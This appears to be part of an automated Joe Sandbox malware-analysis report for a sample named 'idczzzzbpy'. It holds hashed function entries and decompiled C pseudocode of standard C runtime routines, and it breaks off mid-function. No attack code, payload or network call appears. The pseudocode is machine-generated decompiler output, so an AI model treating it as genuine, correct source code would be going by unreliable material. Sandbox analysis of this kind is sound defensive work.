                    Uniqueness Score: -1.00%

                    Function 016A9FE0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2db3fd420b036d965800760ae6d78c78867fe5cf4b2653228b647dba350d825c
                    • Instruction ID: 62680a5329b2ab69af40bb3f4434f682649c629525bf45a322e077355bfd7118
                    • Opcode Fuzzy Hash: 2db3fd420b036d965800760ae6d78c78867fe5cf4b2653228b647dba350d825c
                    • Instruction Fuzzy Hash: 2090027132114403D150659988457470009E7D1245F51C421A0814958DC7D598D17262
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9650 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3cf1cf8a742ff06f0ab7b295e66fec648997d3a5ce120c21a26b673738b4c0b0
                    • Instruction ID: 116cb3e131e19f4d91dc579e57935d599f602770602314ccbed1dded00510d1e
                    • Opcode Fuzzy Hash: 3cf1cf8a742ff06f0ab7b295e66fec648997d3a5ce120c21a26b673738b4c0b0
                    • Instruction Fuzzy Hash: 7D90027121504843D18075994845A870019E7D0349F51C021A0054A94DD7659D95B7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9610 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1e5ac4d1ea1058bd02d750a22369b6f8946bd55fd56efa7cd21cd03fbe117bfe
                    • Instruction ID: 60c44eff75d176efa3d6b1b466f2a502d0fa419355b53425b2fbd49351b97f69
                    • Opcode Fuzzy Hash: 1e5ac4d1ea1058bd02d750a22369b6f8946bd55fd56efa7cd21cd03fbe117bfe
                    • Instruction Fuzzy Hash: DC90027161500803D190759948557870009E7D0345F51C021A0014A54DC7959A9577E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A96D0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6d67cad10537a7e351cdfdcd46456f1df5932940553847c82302da1817c984a2
                    • Instruction ID: 1fc051a138c4060a1ab601344bb6aa36f47e7d215b872d707403a5b750f8972c
                    • Opcode Fuzzy Hash: 6d67cad10537a7e351cdfdcd46456f1df5932940553847c82302da1817c984a2
                    • Instruction Fuzzy Hash: 3E90027121100843D14065994845B870009E7E0345F51C026A0114A54DC755D8917661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction ID: 40dcd1df78db280af3f3d78bf73add64bf03da87ebfbdc4131e1e8725cb5cc2d
                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B38A8 Relevance: 12.2, APIs: 8, Instructions: 229COMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E003B38A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				void** _t105;
				void** _t106;
				void** _t109;
				signed char _t111;
				long _t119;
				void* _t129;
				signed int* _t133;
				void* _t135;
				signed int* _t138;
				void** _t139;
				void* _t141;
				signed int _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0x3c2260);
				E003B2400(__ebx, __edi, __esi);
				E003B442F(0xb);
				 *(_t155 - 4) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E003B4869();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0x3c4848 = _t82;
					 *0x3c50e4 = _t141;
					while(_t133 <  &(_t82[0x200])) {
						_t133[1] = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						_t133[2] = 0;
						_t133[9] = _t133[9] & 0x00000080;
						_t133[9] = _t133[9] & 0x0000007f;
						_t133[9] = 0xa0a;
						_t133[0xe] = 0;
						_t133[0xd] = 0;
						_t133 =  &(_t133[0x10]);
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0x3c4848; // 0x0
					}
					GetStartupInfoW(_t155 - 0x74);
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							if(_t142 >= 3) {
								break;
							}
							_t147 =  *0x3c4848 + (_t142 << 6);
							 *(_t155 - 0x24) = _t147;
							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
								_t147[1] = 0x81;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								if(_t91 == 0xffffffff || _t91 == 0) {
									L45:
									_t147[1] = _t147[1] | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0x3c6100;
									if(_t94 != 0) {
										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
									}
									goto L47;
								} else {
									_t98 = GetFileType(_t91);
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									if(_t99 != 2) {
										if(_t99 != 3) {
											L44:
											_t71 =  &(_t147[3]); // -3950652
											E003B40A2(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											_t147[2] = _t147[2] + 1;
											goto L47;
										}
										_t103 = _t147[1] | 0x00000008;
										L43:
										_t147[1] = _t103;
										goto L44;
									}
									_t103 = _t147[1] | 0x00000040;
									goto L43;
								}
							} else {
								_t147[1] = _t147[1] | 0x00000080;
								L47:
								_t142 = _t142 + 1;
								continue;
							}
						}
						 *(_t155 - 4) = _t129;
						E003B3B53();
						_t86 = 0;
						L49:
						return E003B2445(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 =  &(_t105[1]);
					 *(_t155 - 0x28) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					 *(_t155 - 0x30) = 1;
					while( *0x3c50e4 < _t135) {
						_t138 = E003B4869(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						if(_t138 != 0) {
							0x3c4848[_t149] = _t138;
							 *0x3c50e4 =  *0x3c50e4 + _t141;
							while(_t138 <  &(0x3c4848[_t149][0x200])) {
								_t138[1] = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								_t138[2] = 0;
								_t138[9] = _t138[9] & 0x00000080;
								_t138[9] = 0xa0a;
								_t138[0xe] = 0;
								_t138[0xd] = 0;
								_t138 =  &(_t138[0x10]);
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0x3c50e4;
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *(_t155 - 0x28);
					_t139 =  *(_t155 - 0x20);
					while(_t143 < _t135) {
						_t150 =  *_t139;
						if(_t150 == 0xffffffff || _t150 == _t129) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  &(( *(_t155 - 0x28))[0]);
							 *(_t155 - 0x28) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						} else {
							_t111 =  *_t109;
							if((_t111 & 0x00000001) == 0) {
								goto L22;
							}
							if((_t111 & 0x00000008) != 0) {
								L20:
								_t154 = 0x3c4848[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								_t154[1] =  *( *(_t155 - 0x28));
								_t37 =  &(_t154[3]); // 0xd
								E003B40A2(_t37, 0xfa0, 0);
								_t156 = _t156 + 0xc;
								_t154[2] = _t154[2] + 1;
								_t139 =  *(_t155 - 0x20);
								L21:
								_t135 =  *(_t155 - 0x1c);
								goto L22;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							if(_t119 == 0) {
								goto L21;
							}
							goto L20;
						}
					}
					goto L28;
				}
				_t86 = E003B2600(_t155, 0x3c3400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























                    0x003b38a8
                    0x003b38aa
                    0x003b38af
                    0x003b38b6
                    0x003b38be
                    0x003b38c1
                    0x003b38c5
                    0x003b38c6
                    0x003b38c7
                    0x003b38ce
                    0x003b38d0
                    0x003b38d5
                    0x003b38f2
                    0x003b38f7
                    0x003b38fd
                    0x003b3906
                    0x003b390c
                    0x003b390f
                    0x003b3912
                    0x003b391b
                    0x003b391e
                    0x003b3924
                    0x003b3927
                    0x003b392a
                    0x003b392d
                    0x003b3930
                    0x003b3930
                    0x003b393b
                    0x003b3946
                    0x003b3a7b
                    0x003b3a7d
                    0x003b3a7e
                    0x003b3a7e
                    0x003b3a80
                    0x003b3a80
                    0x003b3a86
                    0x00000000
                    0x00000000
                    0x003b3a91
                    0x003b3a97
                    0x003b3a9d
                    0x003b3ab1
                    0x003b3ab7
                    0x003b3abe
                    0x003b3ac3
                    0x003b3ac5
                    0x003b3ab9
                    0x003b3abb
                    0x003b3abb
                    0x003b3ac9
                    0x003b3acf
                    0x003b3ad5
                    0x003b3b23
                    0x003b3b29
                    0x003b3b2c
                    0x003b3b2e
                    0x003b3b35
                    0x003b3b3a
                    0x003b3b3a
                    0x00000000
                    0x003b3adb
                    0x003b3adc
                    0x003b3ae4
                    0x00000000
                    0x00000000
                    0x003b3ae9
                    0x003b3aeb
                    0x003b3af3
                    0x003b3b00
                    0x003b3b0b
                    0x003b3b12
                    0x003b3b16
                    0x003b3b1b
                    0x003b3b1e
                    0x00000000
                    0x003b3b1e
                    0x003b3b06
                    0x003b3b08
                    0x003b3b08
                    0x00000000
                    0x003b3b08
                    0x003b3af9
                    0x00000000
                    0x003b3af9
                    0x003b3aa3
                    0x003b3aa9
                    0x003b3b3d
                    0x003b3b3d
                    0x00000000
                    0x003b3b3d
                    0x003b3a9d
                    0x003b3b43
                    0x003b3b46
                    0x003b3b4b
                    0x003b3b4d
                    0x003b3b52
                    0x003b3b52
                    0x003b394c
                    0x003b3951
                    0x00000000
                    0x00000000
                    0x003b3957
                    0x003b3959
                    0x003b395c
                    0x003b395f
                    0x003b3964
                    0x003b396e
                    0x003b3970
                    0x003b3972
                    0x003b3972
                    0x003b3977
                    0x003b3978
                    0x003b397b
                    0x003b398d
                    0x003b398f
                    0x003b3994
                    0x003b3a2e
                    0x003b3a35
                    0x003b3a3b
                    0x003b3a4b
                    0x003b3a51
                    0x003b3a54
                    0x003b3a57
                    0x003b3a5b
                    0x003b3a61
                    0x003b3a64
                    0x003b3a67
                    0x003b3a6a
                    0x003b3a6a
                    0x003b3a6f
                    0x003b3a70
                    0x003b3a73
                    0x00000000
                    0x003b3a73
                    0x003b399a
                    0x003b39a0
                    0x00000000
                    0x003b39a0
                    0x003b39a3
                    0x003b39a5
                    0x003b39aa
                    0x003b39ab
                    0x003b39ae
                    0x003b39b1
                    0x003b39b9
                    0x003b39be
                    0x003b3a1b
                    0x003b3a1b
                    0x003b3a1c
                    0x003b3a22
                    0x003b3a23
                    0x003b3a26
                    0x003b3a29
                    0x00000000
                    0x003b39c4
                    0x003b39c4
                    0x003b39c8
                    0x00000000
                    0x00000000
                    0x003b39cc
                    0x003b39dc
                    0x003b39e9
                    0x003b39f0
                    0x003b39f5
                    0x003b39fc
                    0x003b3a06
                    0x003b3a0a
                    0x003b3a0f
                    0x003b3a12
                    0x003b3a15
                    0x003b3a18
                    0x003b3a18
                    0x00000000
                    0x003b3a18
                    0x003b39cf
                    0x003b39d5
                    0x003b39da
                    0x00000000
                    0x00000000
                    0x00000000
                    0x003b39da
                    0x003b39be
                    0x00000000
                    0x003b39b1
                    0x003b38ea
                    0x00000000

                    APIs
                    • __lock.LIBCMT ref: 003B38B6
                      • Part of subcall function 003B442F: __mtinitlocknum.LIBCMT ref: 003B4441
                      • Part of subcall function 003B442F: EnterCriticalSection.KERNEL32(00000000,?,003B37AB,0000000D), ref: 003B445A
                    • __calloc_crt.LIBCMT ref: 003B38C7
                      • Part of subcall function 003B4869: __calloc_impl.LIBCMT ref: 003B4878
                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 003B38E2
                    • GetStartupInfoW.KERNEL32(?,003C2260,00000064,003B1654,003C2190,00000014), ref: 003B393B
                    • __calloc_crt.LIBCMT ref: 003B3986
                    • GetFileType.KERNEL32(00000001), ref: 003B39CF
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                    • String ID:
                    • API String ID: 2772871689-0
                    • Opcode ID: f650a6e1e4164bdb1b97cae910cdb6e6b535979b9fa428d921f05ac310dc86b4
                    • Instruction ID: 3f432dc743191298f6bc49eb10788041ca3d1bf5f50f8f544279b781cd6c1c76
                    • Opcode Fuzzy Hash: f650a6e1e4164bdb1b97cae910cdb6e6b535979b9fa428d921f05ac310dc86b4
                    • Instruction Fuzzy Hash: 49810671D043658FCB12CF68C8406E9BBF4AF05328F24426DD6A6EBBD1D7349A02CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B3815 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E003B3815(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E003B1890(_t3);
				if(E003B4560() != 0) {
					_t6 = E003B4001(E003B35A6);
					 *0x3c350c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E003B4869(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E003B388B();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E003B405D( *0x3c350c, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E003B3762(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E003B388B();
					return 0;
				}
			}








                    0x003b3815
                    0x003b3821
                    0x003b3830
                    0x003b3835
                    0x003b383b
                    0x003b383e
                    0x00000000
                    0x003b3840
                    0x003b384d
                    0x003b3851
                    0x003b3853
                    0x003b3882
                    0x003b3882
                    0x003b3887
                    0x003b388a
                    0x003b3855
                    0x003b3863
                    0x003b3865
                    0x00000000
                    0x003b3867
                    0x003b3867
                    0x003b3869
                    0x003b386a
                    0x003b3871
                    0x003b3877
                    0x003b387b
                    0x003b387f
                    0x003b3881
                    0x003b3881
                    0x003b3865
                    0x003b3853
                    0x003b3823
                    0x003b3823
                    0x003b3823
                    0x003b382a
                    0x003b382a

                    APIs
                    • __init_pointers.LIBCMT ref: 003B3815
                      • Part of subcall function 003B1890: EncodePointer.KERNEL32(00000000,?,003B381A,003B163A,003C2190,00000014), ref: 003B1893
                      • Part of subcall function 003B1890: __initp_misc_winsig.LIBCMT ref: 003B18AE
                      • Part of subcall function 003B1890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003B4117
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003B412B
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003B413E
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003B4151
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003B4164
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003B4177
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003B418A
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003B419D
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003B41B0
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003B41C3
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003B41D6
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003B41E9
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003B41FC
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003B420F
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003B4222
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003B4235
                    • __mtinitlocks.LIBCMT ref: 003B381A
                    • __mtterm.LIBCMT ref: 003B3823
                      • Part of subcall function 003B388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003B3828,003B163A,003C2190,00000014), ref: 003B447A
                      • Part of subcall function 003B388B: _free.LIBCMT ref: 003B4481
                      • Part of subcall function 003B388B: DeleteCriticalSection.KERNEL32(003C3558,?,?,003B3828,003B163A,003C2190,00000014), ref: 003B44A3
                    • __calloc_crt.LIBCMT ref: 003B3848
                    • __initptd.LIBCMT ref: 003B386A
                    • GetCurrentThreadId.KERNEL32 ref: 003B3871
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                    • String ID:
                    • API String ID: 3567560977-0
                    • Opcode ID: 3849b7306357cdb2b4968754146c725abfc3e7cb9b8b7429e5e1d4395a25ace0
                    • Instruction ID: 1d4322243ea08b2953d89089327b051f506d4e11de0ef82a23df88f6346f6a65
                    • Opcode Fuzzy Hash: 3849b7306357cdb2b4968754146c725abfc3e7cb9b8b7429e5e1d4395a25ace0
                    • Instruction Fuzzy Hash: B9F0623250962159E23B76797C026DA2684CF0277CF21862EF750DC8D2EF219A414695
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B91C6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E003B91C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E003B4BFC( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E003B917B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E003B1CC3();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















                    0x003b91ce
                    0x003b91d3
                    0x003b91ed
                    0x00000000
                    0x003b91ed
                    0x003b91d5
                    0x003b91da
                    0x00000000
                    0x00000000
                    0x003b91df
                    0x003b91fc
                    0x003b9201
                    0x003b9204
                    0x003b920b
                    0x003b922a
                    0x003b9231
                    0x003b9233
                    0x003b9277
                    0x003b9283
                    0x003b9286
                    0x003b928b
                    0x003b928e
                    0x003b9294
                    0x003b9296
                    0x003b92a6
                    0x003b92a6
                    0x003b92aa
                    0x003b92ac
                    0x003b92af
                    0x003b92af
                    0x003b92af
                    0x003b92af
                    0x00000000
                    0x003b92b5
                    0x003b9298
                    0x003b9298
                    0x003b929d
                    0x003b929d
                    0x003b92a0
                    0x00000000
                    0x003b92a0
                    0x003b9235
                    0x003b9238
                    0x003b923c
                    0x003b9265
                    0x003b9265
                    0x003b9265
                    0x003b9268
                    0x003b9268
                    0x00000000
                    0x00000000
                    0x003b926a
                    0x003b926e
                    0x00000000
                    0x00000000
                    0x003b9270
                    0x003b9270
                    0x003b9270
                    0x00000000
                    0x003b9270
                    0x003b923e
                    0x003b923e
                    0x003b9241
                    0x00000000
                    0x00000000
                    0x003b9245
                    0x003b924f
                    0x003b9255
                    0x003b9258
                    0x003b925e
                    0x003b9261
                    0x003b9263
                    0x00000000
                    0x00000000
                    0x00000000
                    0x003b9263
                    0x003b920d
                    0x003b9210
                    0x003b9212
                    0x003b9217
                    0x003b9217
                    0x003b921c
                    0x00000000
                    0x003b921c
                    0x003b91e1
                    0x003b91e6
                    0x003b91ea
                    0x003b91ea
                    0x00000000

                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003B91FC
                    • __isleadbyte_l.LIBCMT ref: 003B922A
                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 003B9258
                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 003B928E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID: 8a;
                    • API String ID: 3058430110-416603896
                    • Opcode ID: a938dfdd50aebfcec93b2d4ef4decd16b3633a225d5eeb03dd4b59e3f72e1bc7
                    • Instruction ID: f90b010a2e6e9fa2754f3460f5b6640f4af5431d2e26d5b14c80d42e11a85a22
                    • Opcode Fuzzy Hash: a938dfdd50aebfcec93b2d4ef4decd16b3633a225d5eeb03dd4b59e3f72e1bc7
                    • Instruction Fuzzy Hash: 6A31C331A0024ABFDB238F69CC44BEA7BA9FF41318F16492AE7158B990D731D850DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B12BC Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 69%
                    			E003B12BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E003B1530(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
